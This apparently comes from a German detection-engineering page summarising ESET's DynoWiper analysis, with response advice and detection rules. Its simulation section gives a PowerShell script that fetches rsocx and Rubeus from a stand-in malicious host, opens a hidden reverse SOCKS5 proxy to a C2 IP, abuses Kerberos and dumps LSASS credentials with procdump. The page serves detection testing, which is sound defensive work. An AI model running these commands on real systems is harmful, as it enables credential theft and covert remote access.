ESET Forschung DynoWiper-Update: Technische Analyse und Zuordnung
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
DynoWiper ist ein destruktiver Wiper, der gegen eine Organisation im Energiesektor in Polen eingesetzt wurde und mehrere Endpunkte in den Operationen beeinflusste. Die ausführbaren Dateien wurden an einem gemeinsamen Netzwerkstandort hinterlegt und direkt von dort gestartet. ESET führt die Aktivität mit mittlerer Sicherheit auf Sandworm zurück. Nach der Ausführung beschädigt die Malware gezielt Dateien mit zufälligen Bytes und löst einen erzwungenen Neustart aus, um die Auswirkungen abzuschließen.
Untersuchung
ESET hat drei Proben wiederhergestellt — schtask.exe, schtask2.exe und _update.exe — die unter C:inetpubpub abgelegt wurden. Eingebettete PDB-Pfade deuten darauf hin, dass die Binärdateien in einer Vagrant-Umgebung kompiliert wurden. Reverse Engineering zeigte eine dreistufige Wiping-Routine, bei der zwei Varianten eine fünfsekündige Pause zwischen den Phasen einfügen. Nach dem Kompromittierungsprozess beinhalteten die Artefakte auch das Kerberos-Tool Rubeus und einen rsocx SOCKS5-Proxy im Netzwerk des Opfers.
Minderung
ESET PROTECT auf den betroffenen Systemen blockierte alle drei Varianten und begrenzte so den Schaden. Reduzieren Sie die Exposition, indem Sie die Erstellung unautorisierter geplante Tasks verhindern und unfreiwillige Schreibvorgänge in freigegebene Verzeichnisse überwachen. Fügen Sie Anwendungs-Whitelist hinzu und verhindern Sie, soweit möglich, die Ausführung von Netzlaufwerken.
Antwort
Identifizieren und isolieren Sie Hosts, die schtask.exe, schtask2.exe oder *_update.exe von einem Share ausführen. Bewahren Sie flüchtige Beweise, überprüfen Sie geplante Tasks und PowerShell-Bereitstellungsspuren und entfernen Sie Tools wie Rubeus und rsocx. Führen Sie eine vollständige forensische Untersuchung durch und stellen Sie Daten aus überprüften sauberen Backups wieder her.
Angriffsablauf
Erkennungen
Potenzieller Malware-Selbstentfernung oder Stderr-Verdeckungsbetrieb (über cmdline)
Ansehen
Herunterfahren für das Erzwingen eines Systemstopps oder Neustarts verwendet (über cmdline)
Ansehen
IOCs (HashSha1) zur Erkennung: ESET Research DynoWiper Update: Technische Analyse und Zuordnung
Ansehen
IOCs (SourceIP) zur Erkennung: ESET Research DynoWiper Update: Technische Analyse und Zuordnung
Ansehen
IOCs (DestinationIP) zur Erkennung: ESET Research DynoWiper Update: Technische Analyse und Zuordnung
Ansehen
Erkennung der DynoWiper-Bereitstellung über geplante Task-Ausführung [Windows-Datei-Ereignis]
Ansehen
Erkennung von bösartigen Tools und LSASS-Speicher-Dumping [Windows-Prozesserstellung]
Ansehen
Simulation Ausführung
Voraussetzung: Die Telemetrie- & Basislinien-Pre-Flight-Überprüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die so gestaltet ist, dass sie die Erkennungsregel auslöst. Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
- Richten Sie einen Reverse SOCKS5-Proxy ein unter Verwendung von
rsocx.exe. Der Angreifer lädt die Binärdatei von einem externen Server herunter, platziert sie in%TEMP%, und führt sie mit dem Argument-r 31.172.71.5:8008aus, um einen Rückkanal zurück zum C2-Host zu erstellen. - Führen Sie Kerberos-Ticket-Missbrauch durch mit
rubeus.exe. Das Tool wird ausgeführt, um ein Kerberos-Ticket-Granting Ticket (TGT) für das Domain-Admin-Konto anzufordern und anschließend ein Service-Ticket (s4u2self). - Dumpt LSASS-Speicher unter Verwendung von
procdump.exe(eine häufige Alternative zum Task-Manager), um Anmeldeinformationen zu erfassen. Sysmon zeichnet ein Prozesszugriffsereignis auf, bei dem derprocdump.exeProzess des Angreiferslsass.exemit der Zugriffsmaske0x1010öffnet (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
- Richten Sie einen Reverse SOCKS5-Proxy ein unter Verwendung von
-
Regressionstestskript:
# ------------------------------------------------------------- # Simulationsscript – löst die Sigma-Regel für rsocx, rubeus, # und LSASS-Dump. Führen Sie es mit Administratorrechten aus. # ------------------------------------------------------------- # 1. rsocx.exe bereitstellen (Reverse SOCKS5 Proxy) $rsocxPath = "$env:TEMPrsocx.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden # 2. rubeus.exe bereitstellen (Kerberos-Missbrauch) $rubeusPath = "$env:TEMPrubeus.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden # 3. LSASS mit procdump abdumpen (erfordert Sysinternals) $procdumpPath = "$env:TEMPprocdump.exe" Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip" Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1 if ($procdumpExe) { Copy-Item $procdumpExe.FullName $procdumpPath -Force Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait } Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme." -
Aufräumbefehle:
# Beenden Sie alle verbleibenden bösartigen Prozesse Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force # Entfernen Sie Binärdateien und Dump-Dateien Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue # Optional: temporäre Download-Verzeichnisse löschen Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Bereinigung abgeschlossen."